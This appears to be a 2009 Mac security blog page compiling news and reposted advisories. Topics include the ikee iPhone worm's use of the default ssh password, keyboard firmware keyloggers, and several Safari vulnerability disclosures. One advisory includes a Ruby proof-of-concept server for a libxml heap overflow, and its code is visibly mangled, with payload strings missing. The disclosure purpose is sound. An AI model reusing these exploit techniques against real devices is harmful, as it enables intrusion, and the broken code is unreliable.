Apple has released an update to fix comex’s recent .pdf exploit used by jailbreakme.com to jailbreak iDevices.
You must use iTunes to update your device. This update is not available through Apple Software Update
For more information on the security update Apple Security Updates web site: http://support.apple.com/kb/HT1222
updated 9.11.09
More variants of iPhone malware are showing up, some claiming to gather personal data from phones. Don’t be surprised with the source code for ikee circulating that more nefarious malware will be coming soon.
JailBroken phone w/ alpine default pswd = pwned phone or a honeypot 
iPhone ikee Virus
In the past week or so at least four variants of simple worms that look for default ssh passwords on Jail Broken iPhones and replace the backgrounds screens have turned up. The one in the Netherlands is asking users to paypal 5 € to have it fixed.
JD has an interview with the Australian writer ikee and two versions of the source code are available for research purposes. This variant scans a list of subnets for exploitable iPhones and pwns them replacing the background image with a custom one.
Affected users are iPhone users that have JailBroken their phones and NOT changed their default ssh password of alpine. Take a look here at Saurik’s page with detailed instructions on changing your ssh password.
It is possible for a malicious website to place arbitrary sites into your Top Sites view through automated actions. The attack technique makes use of javascript windows where in a small window is used to repeatedly browse to different sites that the attacker wants to add in your Top Sites list. This window is completely hidden using the window.blur function and user won’t know that is happening in the background. Please note that this attack is not possible using invisible iframes as Safari does not use iframe urls to decide Top Sites content.
For the complete vulnerability report and POC visit: http://securethoughts.com
Apple recently released the new CrashWrangler tools to anyone with a free ADC account, and is available at:
https://connect.apple.com/cgi-bin/WebObjects/MemberSite.woa/wa/getSoftware?bundleID=20390
CrashWrangler is a set of developer tools that help in creating and debugging secure Mac OS X applications. The tools work by inspecting the application’s state at the time of the crash, as well as the application crash logs. Using these tools on a reproducible test case can determine if a crash could lead to a potentially exploitable
security issue, while providing valuable data to fix these issues. Additionally, any crash log can be inspected to determine if it is a duplicate of a known crash. The CrashWrangler tools support Mac OS X 10.5 or later.
It should be understood that CrashWrangler uses advanced heuristics, but that false positives and false negatives are possible. It’s intended for quick assessment. As always, a detailed manual inspection is the only way to be sure something is or isn’t exploitable.
The basic algorithm for determining exploitability looks like this.
Exploitable if:
Crash on write instruction
Crash executing invalid address
Crash calling an invalid address
Crash accessing an uninitialized or freed pointer as indicated by
using the MallocScribble environment variable
Illegal instruction exception
Abort due to -fstack-protector, _FORTIFY_SOURCE, heap corruption detected
Stack trace of crashing thread contains certain functions such as malloc, free, szone_error, objc_MsgSend, etc.
Not exploitable if:
Divide by zero exception
Stack grows too large due to recursion
Null dereference
Other abort
Crash on read instruction
If a crash is determined to be non-exploitable, it’s recommended to run the test case again with libgmalloc(3) on with MALLOC_ALLOW_READS and MALLOC_FILL_SPACE set, and see if the crash changes to one that is
considered to be exploitable.
CrashWrangler does not send any data about your crash to Apple or anyone else. Note that it does forward the information about the crash to CrashReporter, which is part of the OS, and as always it will send info to Apple if and only if you click the “Send to Apple” button in the Crash Reporter dialog.
Apple’s keyboards are no have 8Kb of flash memory, and 256 bytes of RAM. K. Chen has found a way to very easily install keyloggers, rootkits or other malicious code right inside of an Apple keyboard. K. Chen presented his findings at this year’s Black Hat conference.
It’s actually quite easy to abuse the memory and RAM in Apple keyboards, thanks to Apple’s HIDFirmwareUpdaterTool, which is used to update the firmware in HID devices, among which is the Apple keyboard. “The tool is run, a breakpoint set, and then you simply cut and paste the new code into the firmware image in memory. That’s it,” SemiAccurate explains. Nothing is encrypted, decrypted, and it’s all very simple to do. Resume the HIDFirmwareUpdaterTool, and a few seconds later, your keyboard is compromised. Rebooting won’t help, you can’t pull any batteries, and it’s impossible to detect.
In all practical sense you can abuse both the RAM available in keyboards and any other device and there are many Apple firmware updates available for all kinds of devices; graphics cards, keyboards, trackpads, bluetooth, EFI, SuperDrive, AirPort products , Time Capsule, etc.
iPhone security expert Charlie Miller of Independent Security Evaluators (ISE) , along with colleague Collin Mulliner, demonstrated a vulnerability in the SMS messaging system which can ultimately lead to hacking of an iPhone. Miller and Mullinet released their paper “Fuzzing the Phone in your Phone” at Black Hat last week. Other hackers identified similar flaws in the Android and Windows Mobile operating systems, though no complete exploits were demonstrated. However, security researchers Zane Lackey and Luis Miras also demonstrated that the vulnerability can affect any GSM phone, though exactly how each phone reacts to the vulnerability differs.
The problem stems from the SMS system, phones have to accept SMS messages, and these security experts have found that carefully crafted messages can be interpreted as binary instructions instead of text. Some phones may see a scrambled message—the iPhone, for instance, will show a text with just a square—or may see nothing at all. Lackey and Miras showed an exploit for a Sony Ericsson phone that simply showed the message, “New settings received. Install?” The user might easily assume the data is from a legitimate source.
Miller wrote a “non-malicious” exploit for the SMS bug on the iPhone that demonstrated that Miller could take over the device, though he stopped short of actually doing so. “What I actually demoed showed that I could get to the point I could do anything I wanted,” he told Ars over the phone. “I didn’t want to show actual malicious code, but if I wanted to, I could steal contact info or passwords, dial the phone, send other SMS messages, anything.”
Google has already patched the vulnerability that Miller identified in Android and Apple released their iPhone OS 3.0.1 update the day after Miller’s Black Hat presentation. Other phone operating systems would also need patched to the fix the problem.
Miller said that users shouldn’t be worried yet—that is unless Apple and other vendors are slow to release patches. “Probably nothing is going to happen for at least a week,” Miller said. “What I gave out at Black Hat wasn’t enough to actually just turn around and write malware. It took me about two and a half weeks for me to write all the code for my exploit, so it would take some time to be able to duplicate that.”
At the Black Hat security conference on last week, security researcher Dino Dai Zovi presented a proof-of-concept rootkit that runs on Apple’s Mac OS X operating system, underscoring the fact that all software has flaws. Dai Zovi’s proof-of-concept rootkit is called Machiavelli, a reference to the Mach kernel that underpins Mac OS X.
“Machiavelli consists of a Mach proxy server on the local controlling host and a number of remote agent servers that run on remote compromised hosts,” Dai Zovi explains in a technical paper that describes his work. “On the controlling host, rootkit management utilities obtain a proxy Mach port from the proxy server and use it just as a normal application would use a local Mach port.”
With his presentation complete, Dai Zovi plans soon to release several Mac software tools related to his research on his Web site. These include: Inject Bundle, for data injection; iChatSpy, code for logging instant messages; SSLSpy, for logging SSL traffic; iSightSpy, for capturing a single frame from any Apple iSight camera; Machiavelli, for remotely controlling a compromised system; and Uncloak, a rootkit identification tool.
Apple Safari 4.x JavaScript Reload Denial of Service
___________________________________________________________________________________
Author : Marcell ‘SkyOut’ Dietl, Achim Hoffmann
Email : mail [at] marcell-dietl [dot] de
Vendor : http://www.apple.com/
Product : http://www.apple.com/safari/
Found : 12.06.2009
Released : 01.07.2009
Tested on:
– Safari 4.0 at Windows XP SP3
– Safari 4.0.1 at Mac OS X 10.5.7
___________________________________________________________________________________
STEPS TO REPRODUCE
1) Create a HTML file with the following content:
+———-
|
|
2) Create an empty file called “empty.js” in the same directory.
3) Put both files into the WWW directory of your server.
4) Access the HTML file with your browser.
– A popup will appear: Close it.
– A popup will appear: Close it.
– Crash.
5) On Windows:
+———-
| AppName: safari.exe AppVer: 4.530.17.0 ModName: webkit.dll
| ModVer: 4.530.17.0 Offset: 00305f55
+———-
5) On Mac OS X:
+———-
| Process: Safari [298]
| Path: /Applications/Safari.app/Contents/MacOS/Safari
| Identifier: com.apple.Safari
| Version: 4.0.1 (5530.18)
| Build Info: WebBrowser-55301800~1
| Code Type: X86 (Native)
| Parent Process: launchd [163]
|
| Date/Time: 2009-07-01 00:58:48.144 +0200
| OS Version: Mac OS X 10.5.7 (9J61)
| Report Version: 6
|
| Exception Type: EXC_BAD_ACCESS (SIGBUS)
| Exception Codes: KERN_PROTECTION_FAILURE at 0×0000000000000002
|
| Thread 0 crashed with X86 Thread State (32-bit):
| eax: 0×00000002 ebx: 0x900bac11 ecx: 0x00625eec edx: 0×00000000
| edi: 0x00625ec8 esi: 0×00000002 ebp: 0xbfffe778 esp: 0xbfffe5e0
| ss: 0x0000001f efl: 0×00010217 eip: 0x900bac74 cs: 0×00000017
| ds: 0x0000001f es: 0x0000001f fs: 0×00000000 gs: 0×00000037
| cr2: 0×00000002
+———-
___________________________________________________________________________________
Advisory : http://marcell-dietl.de/index/adv_safari_4_x_js_reload_dos.php
Live Demo : http://marcell-dietl.de/index/demo_safari_4_x_js_reload_dos.html
Apple has been informed about the bug, but did not show any interest.
___________________________________________________________________________________
HAVING FUN WITH FULL DISCLOSURE SINCE 2006
n.runs AG
http://www.nruns.com/ security(at)nruns.com
n.runs-SA-2009.006 23-Jun-2009
______________________________________________________________________________________________________________
Vendor: Apple Inc., http://www.apple.com
Affected Products: Safari Browser 3.2.3 all platforms
Vulnerability: Null pointer dereference lead to DoS
Risk: MEDIUM
______________________________________________________________________________________________________________
Vendor communication:
2009/06/07 Bug found
2009/06/08 Preparing PoC’s and problem description for three bug classes (n.runs-SA-2009.004 – n.runs-SA-2009.006); writing initial email
2009/06/08 Apple releases Safari 4.0 [1]
2009/06/09 Sending initial email in midnight hour (UTC/GMT +2 hours)
2009/06/09 Bot reply mail delivered; received Follow-Up ID
2009/06/09 Due to a press release n.runs is now aware of new release; testing three PoC’s; two of them seems to be fixed
2009/06/10 Apple replies and outlining “to take any report of a potential security issue very seriously.” Asking for PoC’s
2009/06/10 Sending all PoC’s with further description and outlining at the time of writing the initial email, n.runs was aware of new Safari release. Two PoC’s (n.runs-SA-2009.005 and n.runs-SA-2009.006) are not working with new Safari release but asking to have a closer look into it.
2009/06/11 Apple response two PoC’s are not working on the latest release, so Apple don’t see the need for any further action. With regards to n.runs-SA-2009.004, Apple acknowledge the issue still affects Safari 4 and is looking to fix it.
2009/06/15 n.runs informs Apple to release this advisory due to time difference
2009/06/23 n.runs releases this advisory
_______________________________________________________________________
Overview:
Quoting http://www.apple.com/safari/:
“What is Safari ?
It’s a browser. It’s a platform. It’s an open invitation to innovate. Whether on a Mac, PC, iPhone, or iPod touch, Safari continuously redefines the browser, providing the most enjoyable way to experience the Internet.”
Description:
A Null Class Pointer Dereference in CoreFoundation.dll has been found while parsing a URL fragment with a high-bit character in a common protocol handler.
In detail, the following flaw was determined:
- Safari crashes in method CFCharacterSetInitInlineBuffer because the first passed pointer argument (stored in ecx) was not sanized. Hence dereferencing a null pointer Sarafi will crash.
Excerpt from stack trace:
CoreFoundation!CFCharacterSetInitInlineBuffer+0×357
CoreFoundation!CFURLCopyFileSystemPath+0xf3
CoreFoundation!CFURLGetWideFileSystemRepresentation+0×23
CFNetwork!CFHTTPMessageSendRequest+0x6e4
CFNetwork!CFHTTPMessageSendRequest+0x96e
CFNetwork!CFHTTPMessageSendRequest+0xad2
CFNetwork!CFURLConnectionSendSynchronousRequest+0x8d7
CFNetwork!CFStreamErrorFromCFError+0x9a0
ntdll!RtlpAllocateFromHeapLookaside+0×42
ntdll!RtlAllocateHeap+0x1c2
Impact
An attacker could trigger the vulnerability by constructing a specially prepared website. When a user views the web page an unexpected application termination occurs.
Kindly note: Whether this circumstance leads to an exploitable condition was not closer investigated.
Solution:
Apple has issued an update to correct this vulnerability. For detailed information about the fixes follow the link in References [1] section of this document.
_______________________________________________________________________
Credit:
Bugs found by Alexios Fakos of n.runs AG.
_______________________________________________________________________
References:
[1] http://support.apple.com/kb/HT3613
This Advisory and Upcoming Advisories:
http://www.nruns.com/security_advisory.php
Advisory Author : Adriel T. Desautels
Researcher : Kevin Finisterre
Advisory ID : NETRAGARD-20090622
Product Name : Mac OS X Publication Subscription
Product Version : < Safari 3.2.3
Vendor Name : http://www.apple.com
Type of Vulnerability : Buffer Overflow
Impact : Arbitrary Code Execution
Vendor Notified : Yes
Patch Released : APPLE-SA-2009-05-12
Discovery Date : 08/2008
______________________________________________________________________________________________________________
[Product Description]
—————————————————————————————————
Now your favorite web browser is also the fastest on any platform. With page load speeds that outperform every other major browser on the Mac or PC, Safari also introduces a few new features to the mix.
Thanks to the built-in RSS reader in Safari, you can scan the latest news, information, and articles from thousands of websites in one simple-to-read, searchable article list that Safari assembles for you. The first browser to feature a built-in RSS reader, Safari is the ideal way to browse the entire web without using a second application.
Introduced in Mac OS X v10.5, Publication Subscription is a technology that offers developers a way to subscribe to web feeds from their applications. Web feeds are documents that contain frequently updated information. You can use Publication Subscription to allow your applications to subscribe to podcasts, photocasts, and any other feed-based document. Publication Subscription handles all the feed downloads and updates automatically. Publication Subscription technologies make use of libxml2 in order to parse RSS data.
Libxml2 is the XML C parser and toolkit developed for the Gnome project (but usable outside of Gnome), it is free software available under the MIT License. XML itself is a metalanguage used to design markup languages, i.e. text language where semantic and structure are added to the content using extra “markup” information enclosed between angle brackets.
[Technical Summary]
—————————————————————————————————
“The ‘libxml’ library is prone to a heap-based buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data.
An attacker can exploit this issue to execute arbitrary within the context of an application using the affected library. Failed exploit attempts will result in a denial-of-service vulnerability.”
– http://www.securityfocus.com/bid/31126
Safari uses the vulnerable libxml library and can be attacked via the feed:// input vector.
[Technical Details]
—————————————————————————————————-
Libxml2 is vulnerable to a heap-based buffer overflow, caused by improper bounds checking in the xmlParseAttValueComplex() function. By parsing exceedingly long XML entity names using Libxml2, a remote attacker can overflow a buffer and execute arbitrary code on the system. If code execution fails a Denial of Service condition may happen.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3529
https://bugzilla.redhat.com/show_bug.cgi?id=461015
http://rhn.redhat.com/errata/RHBA-2008-0878.html
https://bugzilla.redhat.com/show_bug.cgi?id=460396
[Proof Of Concept]
—————————————————————————————————
The following testcases allowed for the creation of the below PoC
https://bugzilla.redhat.com/attachment.cgi?id=315476
https://bugzilla.redhat.com/attachment.cgi?id=315477
https://bugzilla.redhat.com/attachment.cgi?id=315478
https://bugzilla.redhat.com/attachment.cgi?id=315479
https://bugzilla.redhat.com/attachment.cgi?id=315480
https://bugzilla.redhat.com/attachment.cgi?id=315481
https://bugzilla.redhat.com/attachment.cgi?id=315482
#!/usr/bin/ruby
#
# The application PubSubAgent quit unexpectedly.
#
# Process: PubSubAgent [3764]
# Path: /System/Library/Frameworks/PubSub.framework/Versions/A/Resources/PubSubAgent.app/Contents/MacOS/PubSubAgent
# Identifier: PubSubAgent
# Version: ??? (???)
# Code Type: X86 (Native)
# Parent Process: launchd [282]
#
# Date/Time: 2008-10-31 15:31:41.355 -0400
# OS Version: Mac OS X 10.5.5 (9F33)
# Report Version: 6
#
# Exception Type: EXC_BAD_ACCESS (SIGSEGV)
# Exception Codes: KERN_INVALID_ADDRESS at 0×0000000005050500
#
# Thread 0 crashed with X86 Thread State (32-bit):
# eax: 0×41414141 ebx: 0×94580535 ecx: 0×00136150 edx: 0×05050500
# edi: 0×00007000 esi: 0×00100000 ebp: 0xbfffe298 esp: 0xbfffe220
# ss: 0x0000001f efl: 0×00010206 eip: 0×94580605 cs: 0×00000017
# ds: 0x0000001f es: 0x0000001f fs: 0×00000000 gs: 0×00000037
# cr2: 0×05050500
require ‘webrick’
include WEBrick
XML_LOVE =
‘‘ + “\n” +
‘
'‘ + “\n” +
‘
"A" * 1000 + " " +
'"ha"> ]>’ + “\n” +
‘
REDIR_LOVE =
‘‘
s = HTTPServer.new( 
ort => 80 )
class REDIRECT < HTTPServlet::AbstractServlet
def do_GET(req, res)
res.body = REDIR_LOVE
res['Content-Type'] = "text/html"
end
end
class XMLLOVER < HTTPServlet::AbstractServlet
def do_GET(req, res)
res.body = XML_LOVE
res['Content-Type'] = "text/xml"
end
end
s.mount("/", REDIRECT)
s.mount("/pwn", XMLLOVER)
trap("INT"){ s.shutdown }
s.start
[Fix]
---------------------------------------------------------------------------------------------------
https://bugzilla.redhat.com/attachment.cgi?id=315291
http://lists.apple.com/archives/security-announce/2009/May/msg00000.html
[Vendor Status]
—————————————————————————————————
Vendor Notified
[Vendor Comments]
—————————————————————————————————
Safari 3.2.3 is now available and addresses the following:
libxml
CVE-ID: CVE-2008-3529
Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.7, Mac OS X Server v10.5.7, Windows XP or Vista
Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution
Description: A heap buffer overflow exists in libxml’s handling of long entity names. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. Safari 3.2.3 is included in the Mac OS X v10.5.7 update. Safari 3.2.3 on Mac OS X requires either Mac OS X v10.5.7, or Mac OS X v10.4.11 with Security Update 2009-002 installed.
n.runs AG
http://www.nruns.com security(at)nruns.com
n.runs-SA-2009.005 23-Jun-2009
_____________________________________________________________________________________________________________
Vendor: Apple Inc., http://www.apple.com
Affected Products: Safari Browser 3.2.3 all platforms
Vulnerability: Information disclosure to Denial of Service
Risk: MEDIUM
_____________________________________________________________________________________________________________
Vendor communication:
2009/06/07 Bug found
2009/06/08 Preparing PoC’s and problem description for three bug classes (n.runs-SA-2009.004 – n.runs-SA-2009.006); writing initial email
2009/06/08 Apple releases Safari 4.0 [1]
2009/06/09 Sending initial email in midnight hour (UTC/GMT +2 hours)
2009/06/09 Bot reply mail delivered; received Follow-Up ID
2009/06/09 Due to a press release n.runs is now aware of new release; testing three PoC’s; two of them seems to be fixed
2009/06/10 Apple replies and outlining “to take any report of a potential security issue very seriously.” Asking for PoC’s
2009/06/10 Sending all PoC’s with further description and outlining at the time of writing the initial email, n.runs was aware of new Safari release. Two PoC’s (n.runs-SA-2009.005 and n.runs-SA-2009.006) are not working with new Safari release but asking to have a closer look into it.
2009/06/11 Apple response two PoC’s are not working on the latest release, so Apple don’t see the need for any further action. With regards to n.runs-SA-2009.004, Apple acknowledge the issue still affects Safari 4 and is looking to fix it.
2009/06/15 n.runs informs Apple to release this advisory due to time difference
2009/06/23 n.runs releases this advisory
_______________________________________________________________________
Overview:
Quoting http://www.apple.com/safari/:
“What is Safari ? It’s a browser. It’s a platform. It’s an open invitation to innovate. Whether on a Mac, PC, iPhone, or iPod touch, Safari continuously redefines the browser, providing the most enjoyable way to experience the Internet.”
Description:
Passing the file protocol handler to a certain HTML allows to read local files. On Windows it is possible to create an instance of Windows Explorer by calling an executable file. Other operating systems were not tested.
In detail, the following flaw was determined:
- Safari fails to sanitize the file protocol handler thus leading to an information disclosure, e.g. local file theft. Creating dynamically a certain HTML tag and using a valid file path to an executable may lead to a Denial of Service condition.
Impact
An attacker could trigger the vulnerability by constructing a specially prepared html file. When a user views this file, local content can be send to a third party. Additionaly, various ghost instances of Window Explorer may harm the stability of the users system.
Solution:
Apple has issued an update to correct this vulnerability. For detailed information about the fixes follow the link in References [1] section of this document.
_______________________________________________________________________
Credit: Bugs found by Alexios Fakos of n.runs AG.
_______________________________________________________________________
References:
[1] http://support.apple.com/kb/HT3613
This Advisory and Upcoming Advisories:
http://www.nruns.com/security_advisory.php
Content © hard-mac.com. Proudly powered by WordPress. To bookmark this site, press Control+D.
"Black Hat" theme by Nicki Faulk. For best results, please view with Firefox. [ Log in ]